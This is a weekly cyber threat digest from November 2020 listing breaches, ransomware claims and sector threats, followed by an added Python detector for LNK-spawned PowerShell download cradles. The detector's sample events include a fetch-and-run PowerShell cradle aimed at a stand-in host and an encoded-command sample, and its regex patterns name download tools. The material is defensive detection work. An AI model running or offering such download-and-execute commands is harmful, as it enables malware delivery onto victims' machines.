26 November 2020

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Tesla Model X
GO SMS Pro
Facebook Messenger
cPanel
MongoDB
Deep & Dark Web
Name Heat 7
Microsoft SMBv3
Tesla Model X
Facebook Messenger
Netsparker
GO SMS Pro

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company | Information | Affected
Seeley Medical (US) | The Ohio-based medical clinic reported a data breach in which an attacker accessed and stole certain files. These may have included patient names, addresses, phone numbers, medical record numbers, Social Security numbers and prescription information. | 16,196
Kenneth Copeland Ministries (US) | On November 18th, 2020, REvil ransomware operators claimed an attack against Kenneth Copeland Ministries, purportedly stealing 1.2TB of data. A screenshot of an allegedly stolen file directory uploaded to the dark web suggests that financial documents, contracts, bank documents, sales history, and emails have been compromised. | Unknown
Nitro Software (US) | New Zealand’s Computer Emergency Response Team warned individuals that a threat actor claims to be in possession of 2.6 million Nitro PDF users’ email addresses and hashed passwords. | Unknown
Pray Inc (US) | Researchers at vpnMentor discovered four misconfigured AWS S3 buckets belonging to the Christian prayer app Pray[.]com. The exposed data dated from 2016 to the present. Exposed user data included full names, phone numbers, home addresses, email addresses, photos uploaded by users, and more. The app also stored data taken from its users’ contacts, exposing the names, phone numbers, email addresses, and more, of individuals not using the app. | 10,000,000
LSU Health New Orleans Health Care Services Division (US) | An employee’s compromised email account reportedly contained emails and attachments with limited information about patients who received care at a number of facilities. Potentially exposed data includes patient names, medical record numbers, account numbers, dates of birth, Social Security numbers, and more. | Unknown
Miltenyi Biotec (Germany) | On November 4th, 2020, Mount Locker ransomware operators claimed responsibility for an attack against the company and leaked 5% of the 150GB of data supposedly stolen from it on their data leak site. | Unknown
Glofox (Ireland) | The Irish Times reports that gym management software company Glofox has informed several gyms of a possible data breach exposing customer data. The attack, reportedly carried out by ShinyHunters, may have exposed the names, addresses, phone numbers, hashed passwords, and dates of birth of an unspecified number of customers. | Unknown
Spotify (Sweden) | Researchers at vpnMentor identified an unsecured Elasticsearch database containing over 380 million records. The researchers speculated that the data, which included login credentials, was being used to attempt logins to Spotify accounts. | Unknown
Corcoran Group (US) | In June 2020, security researcher Jeremiah Fowler discovered an unprotected and publicly accessible database exposing a total of 30.7 million records. Exposed data included agent names, emails, password keys, security tokens, and other internal records, as well as owner and client data such as names, emails and property data. | Unknown
Law In Order (Australia) | Law In Order was targeted in a NetWalker ransomware attack discovered on November 22nd, 2020. According to the company, there have been reports of a ‘very small proportion’ of data being exfiltrated from its servers. | Unknown
Banijay Group (France) | The entertainment company was targeted in a ransomware attack. According to Cybersecurity Insiders and Deadline, the attackers may have exfiltrated employee data, including ID information, bank details, and home addresses. | Unknown
Peatix Inc (US) | A hacker leaked the data of over 4.2 million users via ads posted on Instagram stories, Telegram channels and several hacking forums. Samples analysed by ZDNet included full names, usernames, email addresses, and salted and hashed passwords. | 4,200,000
Galstan & Ward Family and Cosmetic Dentistry (US) | The practice reported that one of its servers was compromised by an intruder who contacted the practice by phone to demand a ransom. On September 11th, 2020, some files were published on the dark web. Names, addresses, birth dates, Social Security numbers, and dental files may have been viewed by the attackers. | Unknown
Baidu (China) | Researchers at Palo Alto Networks Unit 42 found that the Baidu Search Box and Baidu Map apps collected information such as IMSI and MAC addresses. This information could allow a user to be tracked over their lifetime. | Unknown
Conway Regional Medical Center (US) | The Arkansas medical center identified unauthorised access to an employee email account on October 12th, 2020. The breach exposed patient names, birth dates, email addresses, and Covid-19 test results. | 2,945
WhiteHat Jr (India) | According to The Quint, the company maintained an unsecured AWS S3 bucket which exposed student data. Exposed data included student names, ages, genders, pictures, user IDs, parent names, and progress reports. Another researcher, Santosh Patidar, additionally identified an exposed API belonging to the company, which leaked personal data such as transaction information. | 280,000
Headlam Group (UK) | On November 24th, 2020, the floorcoverings distributor disclosed that it had discovered unauthorised access to some of its computer systems. Evidence that a small amount of data had been exfiltrated was found. | 92,795
Fairchild Medical Center (US) | In July 2020, Fairchild Medical Center was informed of a misconfiguration of one of its servers, resulting in the exposure of records. The server was accessible from December 16th, 2015 to July 31st, 2020. An investigation into the breach could not determine whether unauthorised access to the records had taken place. Potentially accessed data includes medical images, names, dates of birth, patient identification numbers and more. | Unknown
Bristol City Council (UK) | The council accidentally sent an email regarding a new support service to hundreds of individuals that included the names of 487 children and the email addresses of their primary carers. | 487
NHS Highland (UK) | NHS Highland accidentally forwarded a list of 284 diabetic patients to 31 unnamed individuals. The accident exposed the patients’ names, dates of birth, contact information and hospital identification numbers. | 284

Attack Type mentions in Government

[Time series chart] This chart shows the trending Attack Types related to Government over the last week.

Weekly Industry View

Industry View
Industry | Information
Banking & Finance | Researchers at 360 Total Security discovered a banking Trojan named BBtok that is active in Mexico. The malware is delivered via LNK attachments disguised as PDFs in phishing emails. It executes a fileless attack, deploying a PowerShell script to download and run the payload. It is capable of bypassing antivirus detection and executing various backdoor instructions, including manipulating Windows processes and services. BBtok can also display fake banking security verification windows that mimic the appearance of legitimate banking interfaces in an attempt to steal user credentials.
Government | From September to October 2020, Proofpoint researchers observed new phishing activity by TA416 that appears to be a continuation of past campaigns targeting entities associated with diplomatic relations between the Vatican and the Chinese Communist Party, as well as entities in Myanmar. Targeting of organisations in Africa was also observed. Similar past campaigns by the group have been attributed to Mustang Panda and RedDelta. The renewed activity used social engineering lures referencing a provisional agreement between the Vatican Holy See and the Chinese Communist Party and imitated journalists from the Union of Catholic Asian News. The campaign involved a new Golang version of PlugX. The researchers note that this is the first time TA416 has been observed using a Golang binary.
Technology | The UK’s National Cyber Security Centre warned that cybercriminals and nation-state APT groups are attempting to compromise the networks of UK organisations by targeting a vulnerability in MobileIron Core and Connector products. The critical remote code execution flaw is tracked as CVE-2020-15505 and was patched by MobileIron in June 2020. In September 2020, a proof-of-concept exploit became available and threat actors began to target vulnerable networks, in some cases successfully. Targeted sectors include healthcare, legal, local government, and logistics.
Retail & Hospitality | Gemini Advisory researchers reported that US and European banks are experiencing a spike in e-commerce fraud linked to China-based sites registered through the Chinese registrar ename[.]net in the lead-up to Black Friday. The researchers identified one group operating nearly 600 scam sites, 200 of which are linked to Jilin Jiutai Rural Commercial Bank Co Ltd. The nature of the relationship between the bank and the fraudsters is not known at present. The fraud group sets up legitimate-looking online shops that collect customers’ payment card data and personally identifiable information, which is then sold on dark web marketplaces. Corresponding social media accounts are also created to make the businesses appear more legitimate and to advertise their products.
Cryptocurrency | Threat actors targeted employees at GoDaddy with social engineering scams to convince them to transfer ownership and control of certain domains to the attackers. The attacks resulted in breaches at a number of cryptocurrency trading platforms, including Liquid, NiceHash, and potentially Bibox[.]com, Celsius[.]network and Wirex[.]app.

News and information concerning each mentioned industry over the last week.
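The BBtok delivery chain described in the Banking & Finance row (an LNK attachment posing as a PDF that launches a hidden PowerShell download cradle) is a pattern that endpoint process telemetry catches well. What follows is an added example written for this digest, not code from Silobreaker or from 360 Total Security’s research: a small Python detector that scores process-creation events carrying Sysmon Event ID 1-style fields (parent image, image, command line) for PowerShell launched from a user double-click with hidden-window, policy-bypass, download-cradle or encoded-command indicators. The sample events, file paths, the base64 blob and the host example.invalid are all constructed for illustration and are not real telemetry or a real payload.

```python
"""Score process-creation events for the LNK -> PowerShell download-cradle pattern.

Added example, not original digest code. Events are modelled on Sysmon Event ID 1
fields; the sample events below are constructed, not real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # Sysmon ParentImage
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


# PowerShell spawned directly by explorer.exe means a user opened a file or
# shortcut; an .lnk "PDF" from a phishing email lands exactly here.
USER_LAUNCHED = re.compile(r"\\explorer\.exe$", re.I)
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# Flags that hide the window or silence policy/profile checks.
HIDDEN_FLAGS = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?\b|noni(?:nteractive)?\b"
    r"|e(?:xecutionpolicy|p)\s+bypass)", re.I)
# Classic download cradles used to fetch and run a second stage.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b", re.I)
# -EncodedCommand (and its short forms) followed by a base64 blob.
ENCODED = re.compile(r"\s-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)

# Constructed sample events (hypothetical paths; example.invalid is a reserved name).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
              '.DownloadString(\'http://example.invalid/load.ps1\')"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
              r'"C:\Program Files\Adobe\Acrobat\Acrobat.exe" "C:\Users\u\Downloads\factura.pdf"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Get-Date"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -enc "
              "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # Benign scheduled script: bypass/noprofile alone should not trip the detector.
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"),
]


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one event; non-PowerShell images score 0."""
    reasons: list[str] = []
    if not POWERSHELL.search(ev.image):
        return 0, reasons
    score = 0
    if USER_LAUNCHED.search(ev.parent_image):
        score += 1
        reasons.append("PowerShell spawned by explorer.exe (user opened a file or shortcut)")
    if HIDDEN_FLAGS.search(ev.command_line):
        score += 1
        reasons.append("hidden window / policy bypass / no profile flags")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        score += 2
        reasons.append("download cradle in command line")
    if ENCODED.search(ev.command_line):
        score += 2
        reasons.append("encoded command")
    return score, reasons


def detect(events: list[ProcEvent], threshold: int = 3) -> list[dict]:
    """Return the events whose score reaches the threshold, with their reasons."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"index": i, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[hit["index"]]
        print(f"[score {hit['score']}] {ev.image}\n  {ev.command_line}")
        for reason in hit["reasons"]:
            print("  -", reason)
```

The weighting is deliberate: a bypass or no-profile flag on its own is common in legitimate automation (the last sample event), so it only contributes when combined with a user-launched parent, a download cradle or an encoded command. On real data the events would come from the Sysmon or EDR log pipeline rather than the inline list.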
